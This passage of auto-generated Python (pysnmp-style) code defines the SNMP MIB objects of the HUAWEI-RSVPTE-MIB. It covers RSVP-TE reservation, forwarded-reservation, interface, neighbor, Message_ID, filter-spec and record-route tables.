hwRsvpTeResvHopAddr = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 3, 1, 7), OctetString().subtype(subtypeSpec=ValueSizeConstraint(0, 16))).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvHopAddr.setStatus('current')
hwRsvpTeResvHopLih = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 3, 1, 8), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvHopLih.setStatus('current')
hwRsvpTeResvInterface = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 3, 1, 9), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvInterface.setStatus('current')
hwRsvpTeResvService = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 3, 1, 10), QosService()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvService.setStatus('current')
hwRsvpTeResvTSpecRate = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 3, 1, 11), BitRate()).setUnits('bits per second').setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvTSpecRate.setStatus('current')
hwRsvpTeResvTSpecPeakRate = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 3, 1, 12), BitRate()).setUnits('bits per second').setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvTSpecPeakRate.setStatus('current')
hwRsvpTeResvTSpecBurst = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 3, 1, 13), BurstSize()).setUnits('bytes').setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvTSpecBurst.setStatus('current')
hwRsvpTeResvTSpecMinTu = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 3, 1, 14), MessageSize()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvTSpecMinTu.setStatus('current')
hwRsvpTeResvTSpecMaxTu = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 3, 1, 15), MessageSize()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvTSpecMaxTu.setStatus('current')
hwRsvpTeResvRSpecRate = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 3, 1, 16), BitRate()).setUnits('bits per second').setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvRSpecRate.setStatus('current')
hwRsvpTeResvRSpecSlack = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 3, 1, 17), Integer32()).setUnits('microseconds').setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvRSpecSlack.setStatus('current')
hwRsvpTeResvInterval = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 3, 1, 18), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvInterval.setStatus('current')
hwRsvpTeResvScope = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 3, 1, 19), OctetString().subtype(subtypeSpec=ValueSizeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvScope.setStatus('current')
hwRsvpTeResvShared = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 3, 1, 20), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvShared.setStatus('current')
hwRsvpTeResvExplicit = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 3, 1, 21), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvExplicit.setStatus('current')
hwRsvpTeResvRsvpHop = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 3, 1, 22), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvRsvpHop.setStatus('current')
hwRsvpTeResvPolicy = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 3, 1, 23), OctetString().subtype(subtypeSpec=ValueSizeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvPolicy.setStatus('current')
hwRsvpTeResvTtl = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 3, 1, 24), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvTtl.setStatus('current')
hwRsvpTeResvConfirm = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 3, 1, 25), OctetString().subtype(subtypeSpec=ValueSizeConstraint(0, 16))).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvConfirm.setStatus('current')
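# hwRsvpTeResvFwdTable: reservation state forwarded upstream in RESV
# messages; parallels hwRsvpTeResvTable, with the RESV_CONFIRM column
# replaced by Message_ID columns (flag/epoch/number).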
hwRsvpTeResvFwdTable = MibTable((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 4), )
if mibBuilder.loadTexts: hwRsvpTeResvFwdTable.setStatus('current')
hwRsvpTeResvFwdEntry = MibTableRow((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 4, 1), ).setIndexNames((0, "HUAWEI-RSVPTE-MIB", "hwRsvpTeSessionNumber"), (0, "HUAWEI-RSVPTE-MIB", "hwRsvpTeResvFwdNumber"))
if mibBuilder.loadTexts: hwRsvpTeResvFwdEntry.setStatus('current')
hwRsvpTeResvFwdNumber = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 4, 1, 1), Gauge32())
if mibBuilder.loadTexts: hwRsvpTeResvFwdNumber.setStatus('current')
hwRsvpTeResvFwdType = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 4, 1, 2), SessionType()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvFwdType.setStatus('current')
hwRsvpTeResvFwdDestAddr = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 4, 1, 3), OctetString().subtype(subtypeSpec=ValueSizeConstraint(0, 16))).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvFwdDestAddr.setStatus('current')
hwRsvpTeResvFwdSenderAddr = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 4, 1, 4), OctetString().subtype(subtypeSpec=ValueSizeConstraint(0, 16))).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvFwdSenderAddr.setStatus('current')
hwRsvpTeResvFwdDestAddrLength = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 4, 1, 5), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvFwdDestAddrLength.setStatus('current')
hwRsvpTeResvFwdSenderAddrLength = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 4, 1, 6), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvFwdSenderAddrLength.setStatus('current')
hwRsvpTeResvFwdHopAddr = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 4, 1, 7), OctetString().subtype(subtypeSpec=ValueSizeConstraint(0, 16))).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvFwdHopAddr.setStatus('current')
hwRsvpTeResvFwdHopLih = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 4, 1, 8), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvFwdHopLih.setStatus('current')
hwRsvpTeResvFwdInterface = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 4, 1, 9), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvFwdInterface.setStatus('current')
hwRsvpTeResvFwdService = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 4, 1, 10), QosService()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvFwdService.setStatus('current')
hwRsvpTeResvFwdTSpecRate = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 4, 1, 11), BitRate()).setUnits('bits per second').setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvFwdTSpecRate.setStatus('current')
hwRsvpTeResvFwdTSpecPeakRate = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 4, 1, 12), BitRate()).setUnits('bits per second').setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvFwdTSpecPeakRate.setStatus('current')
hwRsvpTeResvFwdTSpecBurst = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 4, 1, 13), BurstSize()).setUnits('bytes').setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvFwdTSpecBurst.setStatus('current')
hwRsvpTeResvFwdTSpecMinTu = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 4, 1, 14), MessageSize()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvFwdTSpecMinTu.setStatus('current')
hwRsvpTeResvFwdTSpecMaxTu = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 4, 1, 15), MessageSize()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvFwdTSpecMaxTu.setStatus('current')
hwRsvpTeResvFwdRSpecRate = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 4, 1, 16), BitRate()).setUnits('bits per second').setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvFwdRSpecRate.setStatus('current')
hwRsvpTeResvFwdRSpecSlack = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 4, 1, 17), Integer32()).setUnits('microseconds').setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvFwdRSpecSlack.setStatus('current')
hwRsvpTeResvFwdInterval = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 4, 1, 18), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvFwdInterval.setStatus('current')
hwRsvpTeResvFwdScope = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 4, 1, 19), OctetString().subtype(subtypeSpec=ValueSizeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvFwdScope.setStatus('current')
hwRsvpTeResvFwdShared = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 4, 1, 20), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvFwdShared.setStatus('current')
hwRsvpTeResvFwdExplicit = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 4, 1, 21), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvFwdExplicit.setStatus('current')
hwRsvpTeResvFwdRsvpHop = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 4, 1, 22), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvFwdRsvpHop.setStatus('current')
hwRsvpTeResvFwdPolicy = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 4, 1, 23), OctetString().subtype(subtypeSpec=ValueSizeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvFwdPolicy.setStatus('current')
hwRsvpTeResvFwdTtl = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 4, 1, 24), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvFwdTtl.setStatus('current')
hwRsvpTeResvFwdMsgIdFlag = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 4, 1, 25), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvFwdMsgIdFlag.setStatus('current')
hwRsvpTeResvFwdMsgIdEpoch = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 4, 1, 26), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvFwdMsgIdEpoch.setStatus('current')
hwRsvpTeResvFwdMsgIdNumber = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 4, 1, 27), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvFwdMsgIdNumber.setStatus('current')
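# hwRsvpTeIfTable: per-interface RSVP attributes (refresh, retransmission,
# hello, summary-refresh and authentication settings), indexed by ifIndex.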
hwRsvpTeIfTable = MibTable((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 5), )
if mibBuilder.loadTexts: hwRsvpTeIfTable.setStatus('current')
hwRsvpTeIfEntry = MibTableRow((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 5, 1), ).setIndexNames((0, "IF-MIB", "ifIndex"))
if mibBuilder.loadTexts: hwRsvpTeIfEntry.setStatus('current')
hwRsvpTeIfUdpNbrs = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 5, 1, 1), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeIfUdpNbrs.setStatus('current')
hwRsvpTeIfIpNbrs = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 5, 1, 2), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeIfIpNbrs.setStatus('current')
hwRsvpTeIfNbrs = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 5, 1, 3), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeIfNbrs.setStatus('current')
hwRsvpTeIfRefreshBlockadeMultiple = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 5, 1, 4), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeIfRefreshBlockadeMultiple.setStatus('current')
hwRsvpTeIfRefreshMultiple = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 5, 1, 5), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeIfRefreshMultiple.setStatus('current')
hwRsvpTeIfTtl = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 5, 1, 6), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeIfTtl.setStatus('current')
hwRsvpTeIfRefreshInterval = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 5, 1, 7), TimeInterval()).setUnits('milliseconds').setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeIfRefreshInterval.setStatus('current')
hwRsvpTeIfRouteDelay = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 5, 1, 8), TimeInterval()).setUnits('hundredths of a second').setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeIfRouteDelay.setStatus('current')
hwRsvpTeIfEnabled = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 5, 1, 9), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeIfEnabled.setStatus('current')
hwRsvpTeIfUdpRequired = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 5, 1, 10), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeIfUdpRequired.setStatus('current')
hwRsvpTeIfStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 5, 1, 11), RowStatus()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: hwRsvpTeIfStatus.setStatus('current')
hwRsvpTeIfHelloEnabled = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 5, 1, 12), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeIfHelloEnabled.setStatus('current')
hwRsvpTeIfSrefreshEnabled = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 5, 1, 13), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeIfSrefreshEnabled.setStatus('current')
hwRsvpTeIfSrefreshInterval = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 5, 1, 14), TimeInterval()).setUnits('milliseconds').setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeIfSrefreshInterval.setStatus('current')
hwRsvpTeIfRetranIncDelta = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 5, 1, 15), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeIfRetranIncDelta.setStatus('current')
hwRsvpTeIfRetranInterval = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 5, 1, 16), TimeInterval()).setUnits('milliseconds').setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeIfRetranInterval.setStatus('current')
hwRsvpTeIfAuthEnabled = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 5, 1, 17), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeIfAuthEnabled.setStatus('current')
hwRsvpTeIfAuthEncrypted = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 5, 1, 18), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeIfAuthEncrypted.setStatus('current')
hwRsvpTeIfAuthHandshake = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 5, 1, 19), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeIfAuthHandshake.setStatus('current')
hwRsvpTeIfAuthLifeTime = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 5, 1, 20), TimeInterval()).setUnits('milliseconds').setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeIfAuthLifeTime.setStatus('current')
hwRsvpTeIfAuthKey = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 5, 1, 21), OctetString().subtype(subtypeSpec=ValueSizeConstraint(0, 392))).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeIfAuthKey.setStatus('current')
hwRsvpTeIfWindowSize = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 5, 1, 22), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeIfWindowSize.setStatus('current')
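# hwRsvpTeNbrTable: per-neighbor state (hello instances, graceful-restart
# timers and status, refresh reduction), indexed by ifIndex and
# hwRsvpTeNbrAddress.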
hwRsvpTeNbrTable = MibTable((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 6), )
if mibBuilder.loadTexts: hwRsvpTeNbrTable.setStatus('current')
hwRsvpTeNbrEntry = MibTableRow((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 6, 1), ).setIndexNames((0, "IF-MIB", "ifIndex"), (0, "HUAWEI-RSVPTE-MIB", "hwRsvpTeNbrAddress"))
if mibBuilder.loadTexts: hwRsvpTeNbrEntry.setStatus('current')
hwRsvpTeNbrAddress = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 6, 1, 1), OctetString().subtype(subtypeSpec=ValueSizeConstraint(0, 16)))
if mibBuilder.loadTexts: hwRsvpTeNbrAddress.setStatus('current')
hwRsvpTeNbrProtocol = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 6, 1, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("ip", 1), ("udp", 2), ("both", 3)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeNbrProtocol.setStatus('current')
hwRsvpTeNbrStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 6, 1, 3), RowStatus()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: hwRsvpTeNbrStatus.setStatus('current')
hwRsvpTeNbrSendersNumber = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 6, 1, 4), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeNbrSendersNumber.setStatus('current')
hwRsvpTeNbrReceiversNumber = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 6, 1, 5), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeNbrReceiversNumber.setStatus('current')
hwRsvpTeNbrHelloEnabled = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 6, 1, 6), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeNbrHelloEnabled.setStatus('current')
hwRsvpTeNbrHelloSrcInstance = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 6, 1, 7), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeNbrHelloSrcInstance.setStatus('current')
hwRsvpTeNbrHelloDstInstance = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 6, 1, 8), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeNbrHelloDstInstance.setStatus('current')
hwRsvpTeNbrHelloLostCounter = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 6, 1, 9), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeNbrHelloLostCounter.setStatus('current')
hwRsvpTeNbrHelloType = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 6, 1, 10), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("request", 1), ("ack", 2), ("none", 3)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeNbrHelloType.setStatus('current')
hwRsvpTeNbrGrCapability = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 6, 1, 11), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeNbrGrCapability.setStatus('current')
hwRsvpTeNbrGrRestartTime = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 6, 1, 12), TimeStamp()).setUnits('milliseconds').setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeNbrGrRestartTime.setStatus('current')
hwRsvpTeNbrGrRecoveryTime = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 6, 1, 13), TimeStamp()).setUnits('milliseconds').setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeNbrGrRecoveryTime.setStatus('current')
hwRsvpTeNbrGrStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 6, 1, 14), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6))).clone(namedValues=NamedValues(("normal", 1), ("supporting", 2), ("restarting", 3), ("restartTimerRunning", 4), ("recoveryTimerRunning", 5), ("grEnd", 6)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeNbrGrStatus.setStatus('current')
hwRsvpTeNbrAuthKeyId = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 6, 1, 15), OctetString().subtype(subtypeSpec=ConstraintsUnion(ValueSizeConstraint(0, 0), ValueSizeConstraint(6, 6)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeNbrAuthKeyId.setStatus('current')
hwRsvpTeNbrReductionEnabled = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 6, 1, 16), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeNbrReductionEnabled.setStatus('current')
hwRsvpTeNbrReliabilityEnabled = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 6, 1, 17), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeNbrReliabilityEnabled.setStatus('current')
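# hwRsvpTeMessageIdTable: Message_ID bookkeeping per neighbor, indexed by
# ifIndex, hwRsvpTeNbrAddress, hwRsvpTeMessageIdEpoch and
# hwRsvpTeMessageIdNumber.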
hwRsvpTeMessageIdTable = MibTable((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 7), )
if mibBuilder.loadTexts: hwRsvpTeMessageIdTable.setStatus('current')
hwRsvpTeMessageIdEntry = MibTableRow((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 7, 1), ).setIndexNames((0, "IF-MIB", "ifIndex"), (0, "HUAWEI-RSVPTE-MIB", "hwRsvpTeNbrAddress"), (0, "HUAWEI-RSVPTE-MIB", "hwRsvpTeMessageIdEpoch"), (0, "HUAWEI-RSVPTE-MIB", "hwRsvpTeMessageIdNumber"))
if mibBuilder.loadTexts: hwRsvpTeMessageIdEntry.setStatus('current')
hwRsvpTeMessageIdEpoch = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 7, 1, 1), Gauge32())
if mibBuilder.loadTexts: hwRsvpTeMessageIdEpoch.setStatus('current')
hwRsvpTeMessageIdNumber = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 7, 1, 2), Gauge32())
if mibBuilder.loadTexts: hwRsvpTeMessageIdNumber.setStatus('current')
hwRsvpTeMessageIdFlag = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 7, 1, 3), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5))).clone(namedValues=NamedValues(("senderIncoming", 1), ("senderOutgoing", 2), ("resv", 3), ("resvFwd", 4), ("rtBuff", 5)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeMessageIdFlag.setStatus('current')
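# hwRsvpTeFilterSpecTable: FILTER_SPEC objects (LSP ID, ingress LSR ID,
# label) per reservation.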
hwRsvpTeFilterSpecTable = MibTable((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 8), )
if mibBuilder.loadTexts: hwRsvpTeFilterSpecTable.setStatus('current')
hwRsvpTeFilterSpecEntry = MibTableRow((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 8, 1), ).setIndexNames((0, "HUAWEI-RSVPTE-MIB", "hwRsvpTeSessionNumber"), (0, "HUAWEI-RSVPTE-MIB", "hwRsvpTeResvNumber"), (0, "HUAWEI-RSVPTE-MIB", "hwRsvpTeFilterSpecNumber"))
if mibBuilder.loadTexts: hwRsvpTeFilterSpecEntry.setStatus('current')
hwRsvpTeFilterSpecNumber = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 8, 1, 1), Gauge32())
if mibBuilder.loadTexts: hwRsvpTeFilterSpecNumber.setStatus('current')
hwRsvpTeFilterSpecLspId = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 8, 1, 2), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeFilterSpecLspId.setStatus('current')
hwRsvpTeFilterSpecIngressLsrId = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 8, 1, 3), OctetString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeFilterSpecIngressLsrId.setStatus('current')
hwRsvpTeFilterSpecLabel = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 8, 1, 4), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeFilterSpecLabel.setStatus('current')
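# hwRsvpTeRroTable: Record Route Object (RRO) subobjects recorded per
# sender.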
hwRsvpTeRroTable = MibTable((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 9), )
if mibBuilder.loadTexts: hwRsvpTeRroTable.setStatus('current')
hwRsvpTeRroEntry = MibTableRow((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 9, 1), ).setIndexNames((0, "HUAWEI-RSVPTE-MIB", "hwRsvpTeSessionNumber"), (0, "HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderNumber"), (0, "HUAWEI-RSVPTE-MIB", "hwRsvpTeRroNumber"))
if mibBuilder.loadTexts: hwRsvpTeRroEntry.setStatus('current')
hwRsvpTeRroNumber = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 9, 1, 1), Gauge32())
if mibBuilder.loadTexts: hwRsvpTeRroNumber.setStatus('current')
